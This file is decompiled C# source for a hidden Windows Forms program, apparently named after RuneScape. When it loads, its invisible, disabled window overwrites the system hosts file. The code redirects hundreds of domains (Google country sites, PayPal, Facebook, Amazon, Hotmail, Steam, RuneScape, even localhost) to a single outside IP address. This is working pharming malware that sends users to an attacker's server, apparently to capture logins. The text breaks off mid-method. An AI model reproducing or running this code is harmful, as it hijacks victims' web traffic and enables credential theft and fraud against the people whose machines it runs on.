using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;

namespace runescape;

[DesignerGenerated]
public class Form1 : Form
{
	private IContainer components;

	public Form1()
	{
		((Form)this).add_Load((EventHandler)Form1_Load);
		InitializeComponent();
	}

	[DebuggerNonUserCode]
	protected override void Dispose(bool disposing)
	{
		try
		{
			if (disposing && components != null)
			{
				components.Dispose();
			}
		}
		finally
		{
			((Form)this).Dispose(disposing);
		}
	}

	[DebuggerStepThrough]
	private void InitializeComponent()
	{
		((Control)this).SuspendLayout();
		SizeF autoScaleDimensions = new SizeF(6f, 13f);
		((ContainerControl)this).set_AutoScaleDimensions(autoScaleDimensions);
		((ContainerControl)this).set_AutoScaleMode((AutoScaleMode)1);
		Size clientSize = new Size(284, 262);
		((Form)this).set_ClientSize(clientSize);
		((Control)this).set_Enabled(false);
		((Control)this).set_Name("Form1");
		((Form)this).set_Opacity(0.0);
		((Form)this).set_Text("Form1");
		((Control)this).ResumeLayout(false);
	}

	private void Form1_Load(object sender, EventArgs e)
	{
		//IL_2a6b: Unknown result type (might be due to invalid IL or missing references)
		//IL_2a70: Unknown result type (might be due to invalid IL or missing references)
		//IL_2a71: Unknown result type (might be due to invalid IL or missing references)
		//IL_2a73: Invalid comparison between Unknown and I4
		//IL_2a84: Unknown result type (might be due to invalid IL or missing references)
		//IL_2a86: Invalid comparison between Unknown and I4
		//IL_2a93: Unknown result type (might be due to invalid IL or missing references)
		string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
		string text = "184.22.81.15";
		string path = folderPath + "\\drivers\\etc\\\\hosts";
		StreamWriter streamWriter = new StreamWriter(path);
		streamWriter.Write("##");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.imeetzu.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " imeetzu.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.omegle.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " omegle.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.runescape.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " runescape.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ae");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.af");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ag");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.off.ai");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.am");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ar");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.as");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.at");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.au");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.az");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ba");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.bd");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.be");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.bg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.bh");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.bi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.bo");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.br");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.bs");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.bw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.bz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ca");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.cd");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.cg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ch");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ci");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ck");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.cl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.cn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.co");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.cr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.cu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.cz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.de");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.dj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.dk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.dm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.do");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ec");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ee");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.eg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.es");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.et");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.fi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.fj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.fm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.fr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ge");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.gg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.gi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.gl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.gm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.gr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.gt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.gy");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.hk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.hn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.hr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ht");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.hu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.id");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ie");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.il");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.im");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.in");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.is");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.it");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.je");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.jm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.jo");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.jp");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ke");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.kg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.kr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.kz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.li");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.lk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ls");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.lt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.lu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.lv");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ly");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ma");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.md");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.mn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ms");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.mt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.mu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.mw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.mx");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.my");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.na");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.nf");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ng");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ni");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.nl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.no");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.np");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.nr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.nu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.nz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.om");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.pa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.pe");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ph");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.pk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.pl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.pn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.pr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.pt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.py");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.qa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ro");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ru");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.rw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.sa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.sb");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.sc");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.se");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.sg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.sh");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.si");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.sk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.sn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.sm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.sv");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.th");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.tj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.tm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.to");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.tp");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.tr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.tt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.tw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.ua");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ug");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.uk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.uy");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.uz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.vc");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.ve");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.vg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.vi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com.vn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.vu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.ws");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.za");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.co.zm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ae");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.af");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ag");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.off.ai");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.am");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ar");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.as");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.at");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.au");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.az");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ba");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.bd");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.be");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.bg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.bh");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.bi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.bo");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.br");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.bs");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.bw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.bz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ca");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.cd");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.cg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ch");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ci");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ck");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.cl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.cn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.co");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.cr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.cu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.cz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.de");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.dj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.dk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.dm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.do");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ec");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ee");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.eg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.es");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.et");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.fi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.fj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.fm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.fr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ge");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.gg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.gi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.gl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.gm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.gr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.gt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.gy");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.hk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.hn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.hr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ht");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.hu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.id");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ie");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.il");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.im");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.in");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.is");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.it");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.je");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.jm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.jo");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.jp");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ke");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.kg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.kr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.kz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.li");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.lk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ls");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.lt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.lu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.lv");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ly");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ma");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.md");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.mn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ms");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.mt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.mu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.mw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.mx");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.my");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.na");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.nf");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ng");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ni");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.nl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.no");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.np");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.nr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.nu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.nz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.om");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.pa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.pe");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ph");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.pk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.pl");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.pn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.pr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.pt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.py");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.qa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ro");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ru");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.rw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.sa");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.sb");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.sc");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.se");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.sg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.sh");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.si");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.sk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.sn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.sm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.sv");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.th");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.tj");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.tm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.to");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.tp");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.tr");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.tt");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.tw");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.ua");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ug");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.uk");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.uy");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.uz");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.vc");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.ve");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.vg");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.vi");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.com.vn");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.vu");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.ws");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.za");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " google.co.zm");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.google.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.youtube.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " youtube.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.msn.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " msn.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.facebook.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " facebook.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.yahoo.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " yahoo.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.hotmail.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " hotmail.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.bing.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " bing.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.twitter.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " twitter.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.myspace.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " myspace.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " 192.168.1.254");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " 127.0.0.1");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " localhost");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.wordpress.org");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " wordpress.org");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " wikipedia.org");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.wikipedia.org");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " blogspot.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " wordpress.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " live.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.live.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.ebay.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " ebay.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.amazon.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " amazon.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.tumblr.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " tumblr.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.paypal.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " paypal.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " imdb.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.imdb.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.steampowered.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " steampowered.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " minecraft.com");
		streamWriter.Write(Environment.NewLine);
		streamWriter.Write(text + " www.minecraft.net");
		streamWriter.Write(Environment.NewLine);
